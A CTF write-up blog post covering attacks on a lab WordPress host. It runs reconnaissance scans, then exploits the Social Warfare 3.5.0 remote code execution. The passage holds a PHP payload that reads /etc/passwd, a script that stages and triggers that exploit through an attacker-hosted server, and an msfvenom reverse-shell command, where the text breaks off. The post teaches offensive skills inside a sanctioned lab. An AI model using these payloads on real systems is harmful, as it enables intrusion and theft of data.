As mentioned in my previous article, our first internal CTF included an offensive security category called Kaos Corp. Since there are multiple hosts in the environment, the write-up is split into a series. In this article, we will concentrate on the host with the DNS name Habanero.
- Rules of Engagement and Scope
- Host discovery
- Port scanning
- More scanning
- Web directory enumeration
- Browsing the site
- Poking around
- More exploits
- Accessing MySQL
- Ransomware key
- Final thoughts
You are a security lead at a renowned University directly supporting the prestigious Scoville Lab. It is a research institute focused on leveraging unprecedented biotechnology techniques to advance the use of capsaicin (8-methyl-N-vanillyl-6-nonenamide) for medical and industrial applications.
The Scoville Lab intellectual property is valuable, and the scientists within this facility have a history of covert operations and sparse documentation. To further isolate their operations, the lab infrastructure is within a private network (172.20.20.0/24). To help separate their network from the main campus, they are behind a firewall.
Leverage OSINT (open-source intelligence) to find the attacker’s method and offensively engage the lab infrastructure to regain administrative control.
- Target 3 to 4 hosts.
- Locate the ransomware encryption key, which credible intelligence suggests they transmitted from one of the Linux servers within the network.
- Engage the Scoville Active Directory Domain Controller and locate the critical research data.
- Decrypt the VeraCrypt Vault containing the research data.
Rules of Engagement and Scope
- Ensure to only practice offensive techniques in sanctioned environments.
- You have explicit permission to engage any host within the IP range 172.20.20.2-172.20.20.100. DO NOT ENGAGE ANY TARGETS OUTSIDE OF THIS SCOPE.
Since we don’t have any information about the hosts, our first step is host discovery. Discovering targets on the network is the initial step of the reconnaissance stage. Typically, I use a ping sweep tool. Keep in mind that a ping sweep only finds hosts that answer ICMP echo requests, and modern operating systems ship with host-based firewalls that often drop them, so a quiet sweep does not prove the range is empty. On the same subnet, an ARP scan is a more reliable check; otherwise, fall back to TCP probes against common ports.
My preferred ping sweep tool is fping rather than Nmap. As mentioned in one of my articles, I came across fping before learning about the nmap -sn command. I have also seen the two produce different results, with fping discovering more hosts than Nmap, although that isn’t always the case. Note that the -g option takes the start and end of the range, which lets us sweep exactly the authorized scope and nothing more.
```
andrew@kali:~$ fping -ga 172.20.20.2 172.20.20.100 2> /dev/null
172.20.20.22
172.20.20.24
172.20.20.35
172.20.20.37
```
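The Rules of Engagement make the authorized range a hard boundary, so it is worth putting a guard between discovery and everything that follows. The script below is an added example, not part of the original write-up: it runs the same fping sweep and drops anything outside 172.20.20.2-172.20.20.100, reporting it on stderr instead of passing it on to the port scanner. The range bounds are the ones stated in the RoE above; the output file name targets.txt is my choice.

```shell
#!/bin/sh
# Added example (not from the original post): scope-checked host discovery.
# Bounds come from the Rules of Engagement: 172.20.20.2 - 172.20.20.100.
SCOPE_LO="172.20.20.2"
SCOPE_HI="172.20.20.100"

# ip_to_int A.B.C.D: dotted quad to one integer so addresses can be compared as a range.
ip_to_int() {
  oldifs=$IFS; IFS=.
  set -- $1
  IFS=$oldifs
  echo $(( ($1 << 24) + ($2 << 16) + ($3 << 8) + $4 ))
}

# in_scope IP: succeeds only if IP lies within [SCOPE_LO, SCOPE_HI] inclusive.
in_scope() {
  ip=$(ip_to_int "$1"); lo=$(ip_to_int "$SCOPE_LO"); hi=$(ip_to_int "$SCOPE_HI")
  [ "$ip" -ge "$lo" ] && [ "$ip" -le "$hi" ]
}

# filter_scope: read hosts (one per line) on stdin, print the in-scope ones on stdout,
# and report anything else on stderr so it is never fed to a scanner by accident.
filter_scope() {
  while IFS= read -r host; do
    [ -n "$host" ] || continue
    if in_scope "$host"; then
      printf '%s\n' "$host"
    else
      printf 'OUT OF SCOPE (dropped): %s\n' "$host" >&2
    fi
  done
  return 0
}

# The post's fping sweep, passed through the guard. Run with:  sh scope.sh sweep
case "${1:-}" in
  sweep) fping -ga "$SCOPE_LO" "$SCOPE_HI" 2>/dev/null | filter_scope | tee targets.txt ;;
esac
```

The sweep itself only fires when the script is invoked with the sweep argument, so the functions can be sourced and reused (for example, to check a host before handing it to nmap) without touching the network.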
Now that we have our target hosts, we can now continue our network reconnaissance. Since this is a series of articles, let’s concentrate on one host at a time. For our first target, let’s start with the 172.20.20.22 host.
Since we have explicit permission to attack the hosts that fall in scope, let’s use the -A option, which performs OS and version detection, script scanning (the default NSE script set), and traceroute. Before running script scanning on a real-world engagement, make sure it is authorized, as some of the default scripts are intrusive and running them may violate the contract. The -p- option scans all TCP ports from 1 to 65535 instead of Nmap’s default top 1000, and -T4 speeds up the timing, which is fine on a lab network.
nmap -A -p- 172.20.20.22 -T4

```
andrew@kali:~$ nmap -A -p- 172.20.20.22 -T4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-11 20:23 PDT
Nmap scan report for 172.20.20.22
Host is up (0.030s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 80:ba:c4:f9:0a:b7:3f:0f:09:e5:14:82:c4:e6:91:59 (RSA)
|   256 59:38:b6:f0:c0:9e:49:81:1f:f7:86:c2:62:d3:7d:a9 (ECDSA)
|_  256 36:0b:d2:2e:cc:21:ee:45:17:ee:0d:a1:f8:e5:88:c0 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 4.9.15
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Scoville Lab Intranet – Spicy Research in the Public Int...
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Login to Webmin
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.02 seconds
```
WordPress itself, and even more so its third-party plugins and themes, is a frequent source of security vulnerabilities, so let’s run a scan to list the installed plugins and themes along with their known vulnerabilities, if any. The tool I know for this task is WPScan.
By default, Kali should have this installed. If not, it’s easy to install by issuing the sudo apt install wpscan command.
While the tool is free, WPScan offers API plans that let the scanner include known vulnerabilities directly in its CLI output. Using an API token saves time; without the --api-token argument, the output lists the detected versions but not the vulnerabilities tied to the core software, plugins, and themes.
The free tier is limited to 25 API requests per day. For a small site this may be enough, but every component whose version is checked costs a request, so a WordPress site with many plugins can exhaust it. If that’s the case, you can pay for a month to raise the limit.
Alternatively, we can run the scan without the API argument and look up the reported versions on their website ourselves.
wpscan --url http://172.20.20.22 --api-token API-TOKEN-HERE

```
andrew@kali:~$ wpscan --url http://172.20.20.22 --api-token API-TOKEN-HERE
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.17
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://172.20.20.22/ [172.20.20.22]
[+] Started: Thu Jun 11 23:28:03 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://172.20.20.22/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://172.20.20.22/xmlrpc.php
 | Found By: Link Tag (Passive Detection)
 | Confidence: 100%
 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://172.20.20.22/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://172.20.20.22/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://172.20.20.22/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.15 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://172.20.20.22/feed/, https://wordpress.org/?v=4.9.15
 |  - http://172.20.20.22/comments/feed/, https://wordpress.org/?v=4.9.15
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: WordPress 4.7-5.7 - Authenticated Password Protected Pages Exposure
 |     Fixed in: 4.9.17
 |     References:
 |      - https://wpscan.com/vulnerability/6a3ec618-c79e-4b9c-9020-86b157458ac5
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29450
 |      - https://wordpress.org/news/2021/04/wordpress-5-7-1-security-and-maintenance-release/
 |      - https://blog.wpscan.com/2021/04/15/wordpress-571-security-vulnerability-release.html
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pmmh-2f36-wvhq
 |      - https://core.trac.wordpress.org/changeset/50717/
 |      - https://www.youtube.com/watch?v=J2GXmxAdNWs
 |
 | [!] Title: WordPress 3.7 to 5.7.1 - Object Injection in PHPMailer
 |     Fixed in: 4.9.18
 |     References:
 |      - https://wpscan.com/vulnerability/4cd46653-4470-40ff-8aac-318bee2f998d
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36326
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19296
 |      - https://github.com/WordPress/WordPress/commit/267061c9595fedd321582d14c21ec9e7da2dcf62
 |      - https://wordpress.org/news/2021/05/wordpress-5-7-2-security-release/
 |      - https://github.com/PHPMailer/PHPMailer/commit/e2e07a355ee8ff36aba21d0242c5950c56e4c6f9
 |      - https://www.wordfence.com/blog/2021/05/wordpress-5-7-2-security-release-what-you-need-to-know/
 |      - https://www.youtube.com/watch?v=HaW15aMzBUM

[+] WordPress theme in use: twentyfifteen
 | Location: http://172.20.20.22/wp-content/themes/twentyfifteen/
 | Last Updated: 2021-03-09T00:00:00.000Z
 | Readme: http://172.20.20.22/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 2.9
 | Style URL: http://172.20.20.22/wp-content/themes/twentyfifteen/style.css?ver=4.9.15
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.9 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://172.20.20.22/wp-content/themes/twentyfifteen/style.css?ver=4.9.15, Match: 'Version: 1.9'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] photo-gallery
 | Location: http://172.20.20.22/wp-content/plugins/photo-gallery/
 | Last Updated: 2021-05-17T09:26:00.000Z
 | [!] The version is out of date, the latest version is 1.5.75
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | [!] 14 vulnerabilities identified:
 |
 | [!] Title: Photo Gallery by WD <= 1.3.35 - Authenticated SQL Injection
 |     Fixed in: 1.3.36
 |     References:
 |      - https://wpscan.com/vulnerability/7ee790bd-84fb-4625-a308-da5d50677589
 |      - https://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf
 |
 | [!] Title: Photo Gallery by WD <= 1.3.42 - Authenticated Path Traversal
 |     Fixed in: 1.3.43
 |     References:
 |      - https://wpscan.com/vulnerability/77790dc5-1cd1-461a-b14a-20c67b3ffb5f
 |      - https://advisories.dxw.com/advisories/path-traversal-in-photo-gallery-may-allow-admins-to-read-most-files-on-the-filesystem/
 |      - https://plugins.trac.wordpress.org/changeset/1667128/photo-gallery
 |
 | [!] Title: Photo Gallery by WD <= 1.3.50 - Authenticated SQL Injection
 |     Fixed in: 1.3.51
 |     References:
 |      - https://wpscan.com/vulnerability/f0a9861c-e9f8-4e8d-aee7-e1cf72f51077
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12977
 |      - https://github.com/jgj212/Advisories/blob/master/photo-gallery.1.3.50-SQL
 |      - https://plugins.trac.wordpress.org/changeset/1712095/photo-gallery
 |
 | [!] Title: Photo Gallery by WD <= 1.3.66 - Cross-Site Scripting (XSS)
 |     Fixed in: 1.3.67
 |     References:
 |      - https://wpscan.com/vulnerability/a320f45c-e25b-48d4-8f86-febf7b789b3b
 |      - https://plugins.trac.wordpress.org/changeset/1787251/photo-gallery
 |
 | [!] Title: Photo Gallery by 10Web <= 1.5.24 - Authenticated LFI
 |     Fixed in: 1.5.25
 |     References:
 |      - https://wpscan.com/vulnerability/bb01dd50-72fe-4e43-9d79-122937a9b39c
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14798
 |      - https://plugins.trac.wordpress.org/changeset?reponame=&new=2088371%40photo-gallery&old=2087556%40photo-gallery
 |
 | [!] Title: Photo Gallery by 10Web <= 1.5.22 - Authenticated XSS
 |     Fixed in: 1.5.23
 |     References:
 |      - https://wpscan.com/vulnerability/0abaa335-6847-4d56-ac39-69a05157bb70
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14797
 |      - https://plugins.trac.wordpress.org/changeset?reponame=&new=2087021%40photo-gallery&old=2085993%40photo-gallery
 |
 | [!] Title: Photo Gallery by 10Web <= 1.5.30 - SQL Injection
 |     Fixed in: 1.5.31
 |     References:
 |      - https://wpscan.com/vulnerability/9d64f953-76a7-4aca-ab7b-2e2704b96642
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14313
 |      - https://fortiguard.com/zeroday/FG-VD-19-101
 |      - https://www.fortinet.com/blog/threat-research/wordpress-plugin-sql-injection-vulnerability.html
 |
 | [!] Title: Photo Gallery by 10Web < 1.5.35 - SQL Injection & XSS
 |     Fixed in: 1.5.35
 |     References:
 |      - https://wpscan.com/vulnerability/9875076d-e84e-4deb-a3d3-06d877b41085
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16117
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16118
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16119
 |
 | [!] Title: Photo Gallery < 1.5.46 - Multiple Cross-Site Scripting (XSS) Issues
 |     Fixed in: 1.5.46
 |     References:
 |      - https://wpscan.com/vulnerability/f626f6f7-6b90-403c-a135-37ca4d9c53e6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9335
 |      - https://fortiguard.com/zeroday/FG-VD-20-033
 |
 | [!] Title: Photo Gallery by 10Web < 1.5.55 - Unauthenticated SQL Injection
 |     Fixed in: 1.5.55
 |     References:
 |      - https://wpscan.com/vulnerability/2e33088e-7b93-44af-aa6a-e5d924f86e28
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24139
 |      - https://plugins.trac.wordpress.org/changeset/2304193
 |
 | [!] Title: Photo Gallery by 10Web < 1.5.68 - Reflected Cross-Site Scripting (XSS)
 |     Fixed in: 1.5.68
 |     References:
 |      - https://wpscan.com/vulnerability/32aee3ea-e0af-44da-a16c-102c83eaed8f
 |      - https://plugins.trac.wordpress.org/changeset/2467205
 |      - https://packetstormsecurity.com/files/162227/
 |
 | [!] Title: Photo Gallery by 10web < 1.5.69 - Reflected Cross-Site Scripting (XSS)
 |     Fixed in: 1.5.69
 |     References:
 |      - https://wpscan.com/vulnerability/6e5f0e04-36c0-4fb6-8194-fe32c15cb3b5
 |      - https://plugins.trac.wordpress.org/changeset/2476338
 |
 | [!] Title: Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS)
 |     Fixed in: 1.5.69
 |     References:
 |      - https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24291
 |      - https://packetstormsecurity.com/files/162227/
 |
 | [!] Title: Photo Gallery < 1.5.67 - Authenticated Stored Cross-Site Scripting via Gallery Title
 |     Fixed in: 1.5.67
 |     References:
 |      - https://wpscan.com/vulnerability/f34096ec-b1b0-471d-88a4-4699178a3165
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24310
 |
 | Version: 1.2.50 (100% confidence)
 | Found By: Query Parameter (Passive Detection)
 |  - http://172.20.20.22/wp-content/plugins/photo-gallery/css/bwg_frontend.css?ver=1.2.50
 |  - http://172.20.20.22/wp-content/plugins/photo-gallery/css/jquery.mCustomScrollbar.css?ver=1.2.50
 |  - http://172.20.20.22/wp-content/plugins/photo-gallery/js/bwg_frontend.js?ver=1.2.50
 |  - http://172.20.20.22/wp-content/plugins/photo-gallery/js/jquery.mobile.js?ver=1.2.50
 |  - http://172.20.20.22/wp-content/plugins/photo-gallery/js/jquery.mCustomScrollbar.concat.min.js?ver=1.2.50
 |  - http://172.20.20.22/wp-content/plugins/photo-gallery/js/bwg_gallery_box.js?ver=1.2.50
 | Confirmed By:
 |  Readme - Stable Tag (Aggressive Detection)
 |   - http://172.20.20.22/wp-content/plugins/photo-gallery/readme.txt
 |  Readme - ChangeLog Section (Aggressive Detection)
 |   - http://172.20.20.22/wp-content/plugins/photo-gallery/readme.txt

[+] social-warfare
 | Location: http://172.20.20.22/wp-content/plugins/social-warfare/
 | Last Updated: 2021-05-17T19:38:00.000Z
 | [!] The version is out of date, the latest version is 4.2.1
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By:
 |  Urls In 404 Page (Passive Detection)
 |  Comment (Passive Detection)
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Arbitrary Settings Update
 |     Fixed in: 3.5.3
 |     References:
 |      - https://wpscan.com/vulnerability/32085d2d-1235-42b4-baeb-bc43172a4972
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9978
 |      - https://wordpress.org/support/topic/malware-into-new-update/
 |      - https://www.wordfence.com/blog/2019/03/unpatched-zero-day-vulnerability-in-social-warfare-plugin-exploited-in-the-wild/
 |      - https://threatpost.com/wordpress-plugin-removed-after-zero-day-discovered/143051/
 |      - https://twitter.com/warfareplugins/status/1108826025188909057
 |      - https://www.wordfence.com/blog/2019/03/recent-social-warfare-vulnerability-allowed-remote-code-execution/
 |
 | [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE)
 |     Fixed in: 3.5.3
 |     References:
 |      - https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618
 |      - https://www.webarxsecurity.com/social-warfare-vulnerability/
 |
 | Version: 3.5.0 (100% confidence)
 | Found By: Comment (Passive Detection)
 |  - http://172.20.20.22/, Match: 'Social Warfare v3.5.0'
 | Confirmed By:
 |  Query Parameter (Passive Detection)
 |   - http://172.20.20.22/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.0
 |   - http://172.20.20.22/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.0
 |  Readme - Stable Tag (Aggressive Detection)
 |   - http://172.20.20.22/wp-content/plugins/social-warfare/readme.txt
 |  Readme - ChangeLog Section (Aggressive Detection)
 |   - http://172.20.20.22/wp-content/plugins/social-warfare/readme.txt

[+] wp-spritz
 | Location: http://172.20.20.22/wp-content/plugins/wp-spritz/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-02-01T12:02:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 4.1 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://172.20.20.22/wp-content/plugins/wp-spritz/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:02 <========================================> (137 / 137) 100.00% Time: 00:00:02

[i] No Config Backups Found.

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 5
 | Requests Remaining: 20

[+] Finished: Thu Jun 11 23:28:11 2021
[+] Requests Done: 179
[+] Cached Requests: 11
[+] Data Sent: 44.779 KB
[+] Data Received: 263.055 KB
[+] Memory used: 202.277 MB
[+] Elapsed time: 00:00:08
```
The tool gave us plenty to work with. The finding that caught my eye is the unauthenticated remote code execution (RCE) in the social-warfare plugin: the installed version is 3.5.0 and the fix shipped in 3.5.3. We can use this later when we start attacking.
Web directory enumeration
Attackers typically perform web directory enumeration to find files and directories that are not linked from the site. There are two approaches: pure brute force, which tries every possible name, and dictionary-based, which tries names from a wordlist. Dictionary-based is by far the most common because pure brute force is prohibitively time-consuming.
Many tools can perform web directory enumeration, such as DIRB, Gobuster, and DirBuster. I first learned about DIRB but quickly realized that it’s slow. DirBuster is faster because it’s multi-threaded, but it is a GUI-based tool, and I prefer CLI-based tools. Then I learned about Gobuster, noticed it enumerates much quicker than DIRB, and have used it since.
gobuster dir -u http://172.20.20.22 -w /usr/share/wordlists/dirb/common.txt

```
andrew@kali:~$ gobuster dir -u http://172.20.20.22 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.20.20.22
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/06/12 22:23:35 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/0                    (Status: 301) [Size: 0] [--> http://172.20.20.22/]
/admin                (Status: 302) [Size: 0] [--> http://172.20.20.22/wp-admin/]
/atom                 (Status: 301) [Size: 0] [--> http://172.20.20.22/feed/atom/]
/B                    (Status: 301) [Size: 0] [--> http://172.20.20.22/blog/]
/b                    (Status: 301) [Size: 0] [--> http://172.20.20.22/blog/]
/bl                   (Status: 301) [Size: 0] [--> http://172.20.20.22/blog/]
/Blog                 (Status: 301) [Size: 0] [--> http://172.20.20.22/Blog/]
/blog                 (Status: 301) [Size: 0] [--> http://172.20.20.22/blog/]
/coffee               (Status: 301) [Size: 0] [--> http://172.20.20.22/coffee/]
/comment-page-1       (Status: 301) [Size: 0] [--> http://172.20.20.22/]
/dashboard            (Status: 302) [Size: 0] [--> http://172.20.20.22/wp-admin/]
/embed                (Status: 301) [Size: 0] [--> http://172.20.20.22/]
/favicon.ico          (Status: 200) [Size: 0]
/feed                 (Status: 301) [Size: 0] [--> http://172.20.20.22/feed/]
/h                    (Status: 301) [Size: 0] [--> http://172.20.20.22/2020/10/13/hello-world/]
/H                    (Status: 301) [Size: 0] [--> http://172.20.20.22/2020/10/13/hello-world/]
/hello                (Status: 301) [Size: 0] [--> http://172.20.20.22/2020/10/13/hello-world/]
/home                 (Status: 301) [Size: 0] [--> http://172.20.20.22/]
/Home                 (Status: 301) [Size: 0] [--> http://172.20.20.22/]
/index.php            (Status: 301) [Size: 0] [--> http://172.20.20.22/]
/login                (Status: 302) [Size: 0] [--> http://172.20.20.22/wp-login.php]
/page2                (Status: 301) [Size: 0] [--> http://172.20.20.22/page/2/]
/page1                (Status: 301) [Size: 0] [--> http://172.20.20.22/]
/rdf                  (Status: 301) [Size: 0] [--> http://172.20.20.22/feed/rdf/]
/robots.txt           (Status: 200) [Size: 67]
/rss                  (Status: 301) [Size: 0] [--> http://172.20.20.22/feed/]
/rss2                 (Status: 301) [Size: 0] [--> http://172.20.20.22/feed/]
/server-status        (Status: 403) [Size: 277]
/W                    (Status: 301) [Size: 0] [--> http://172.20.20.22/2020/10/14/wordpress-installed/]
/w                    (Status: 301) [Size: 0] [--> http://172.20.20.22/2020/10/14/wordpress-installed/]
/word                 (Status: 301) [Size: 0] [--> http://172.20.20.22/2020/10/14/wordpress-installed/]
/wordpress            (Status: 301) [Size: 0] [--> http://172.20.20.22/2020/10/14/wordpress-installed/]
/wp-admin             (Status: 301) [Size: 315] [--> http://172.20.20.22/wp-admin/]
/wp-content           (Status: 301) [Size: 317] [--> http://172.20.20.22/wp-content/]
/wp-includes          (Status: 301) [Size: 318] [--> http://172.20.20.22/wp-includes/]
/xmlrpc.php           (Status: 405) [Size: 42]
===============================================================
2021/06/12 22:25:37 Finished
===============================================================
```
Browsing the site
The main page doesn’t offer much from a visitor’s or an attacker’s point of view. One of the things I learned from achieving eJPT and participating in CTFs is to view the page source to glean information such as HTML comments, plugin and theme versions, and paths that are not linked anywhere. The page source doesn’t have much here either, so let’s move on to the other pages we found.
Looking through our Gobuster enumeration results, the next interesting one to me is the blog page. My site has a blog page, so I know that a collection of posts is usually there. That said, let’s visit the site and see if we can find something there.
I hope having credentials in plain sight is not something pen testers see every day in their professional lives. But I wouldn’t be surprised if they see it from time to time. Let’s try it out and see if it’s a valid account.
It looks like the login credentials work, and we have an administrator role! We can use this in the exploitation stage.
WordPress allows some roles to create posts and pages. Some of those are hidden from the public because they are still drafts or are restricted to authorized users, so now that we can log in, it’s worth looking at what is in them.
Looking at the Exploit-DB site, I saw that Webmin 1.910, the version Nmap reported on port 10000, has a security vulnerability that we can also exploit. As the advisory notes, it requires a user authorized to use the “Package Updates” module, and since we have such an account, we can use it to exploit the vulnerability.
With the Webmin and WordPress credentials, and the unauthenticated RCE, it looks promising that we can take the control back and remediate the vulnerabilities.
Unauthenticated RCE Method
From an attacker’s perspective, this is an excellent attack vector because no login credentials are needed. However, it is challenging to read the command output on the web, as you can see below.
As stated on the WPScan page, the plugin vulnerability is easy to exploit: we create a payload file, host it on a web server we control, point the vulnerable plugin at it, and the command output shows up in the page.
Creating the file is easy. Launch your favorite editor, type the line below, then save and exit. The <pre> tags are part of the payload, not formatting: the plugin executes whatever it finds between them as PHP, so system('cat /etc/passwd') runs on the target.
<pre>system('cat /etc/passwd')</pre>
Launching a web server is easy on Kali because it has Python installed, and Python ships with a built-in HTTP server module that serves the current directory. Kali has both Python versions installed, so either one works (Python 2 is end-of-life, so prefer python3 where you can). Run the server from the directory that holds the payload file; binding port 80 requires root, hence the sudo.
With Python 2:

```
andrew@kali:~$ sudo python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
```

With Python 3:

```
andrew@kali:~$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```
Once the HTTP server module is up and running, enter the URL as shown below.
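The three manual steps above (write the payload, serve it, make the plugin fetch it) are repetitive when you want to run more than one command, so here they are as a script. This is an added example, not code from the original write-up. The payload format is the one the post describes; the trigger request (admin-post.php with swp_debug=load_options and swp_url pointing at our server) is taken from the public write-ups that the WPScan output links to, since the post only shows it in a screenshot. The hosts are the lab addresses used throughout the post.

```shell
#!/bin/sh
# Added example (not from the original post): stage and trigger the Social Warfare 3.5.0
# debug-option payload. Trigger parameters come from the public advisories, not this page.
SW_TARGET="172.20.20.22"
SW_ATTACKER="10.10.10.2"

# make_payload CMD FILE: the plugin evaluates whatever sits between the <pre> tags as
# PHP, so the tags are part of the payload. CMD is embedded in a PHP single-quoted
# string, so a single quote inside it would break the payload; refuse it up front.
make_payload() {
  cmd="$1"; out="$2"
  case "$cmd" in
    *\'*) echo "make_payload: command must not contain a single quote" >&2; return 1 ;;
  esac
  printf "<pre>system('%s')</pre>\n" "$cmd" > "$out"
}

# trigger_url FILE: the request that makes the vulnerable debug handler download
# http://<attacker>/FILE and run it; the command output comes back in the response body.
trigger_url() {
  printf 'http://%s/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://%s/%s\n' \
    "$SW_TARGET" "$SW_ATTACKER" "$1"
}

# run_exploit CMD: serve the payload on port 80 (needs root, as in the post), fire the
# trigger, print the response, stop the server. Only runs as:  sudo sh sw.sh run 'id'
run_exploit() {
  make_payload "$1" payload.txt || return 1
  python3 -m http.server 80 >/dev/null 2>&1 &
  srv=$!
  sleep 1
  curl -s "$(trigger_url payload.txt)"
  kill "$srv"
}

case "${1:-}" in
  run) run_exploit "${2:-id}" ;;
esac
```

Because the response is a full WordPress page with the command output embedded in it, piping the curl output through something like sed -n '/<pre>/,/<\/pre>/p' makes it readable; the single-quote restriction is why the post chains commands with semicolons instead of quoting them.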
While this works, it is clumsy to drive an attack through a web page one command at a time. What we can do instead is create a reverse shell.
This particular host doesn’t have netcat installed. Unfortunately, it also doesn’t have access to the Internet to download it. That said, we have to find another way to create a reverse shell.
One of the things I learned from eJPT is the use of Metasploit. While I’ve used this in the past, I still learned a few things from the journey. One of them is generating a payload to where we can create a reverse shell.
To generate a Linux-based stageless Meterpreter reverse shell payload, use MSFvenom, as shown below. Note, there are many payloads available in Metasploit.
```
andrew@kali:~$ msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=10.10.10.2 lport=4444 -f elf > rshell
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
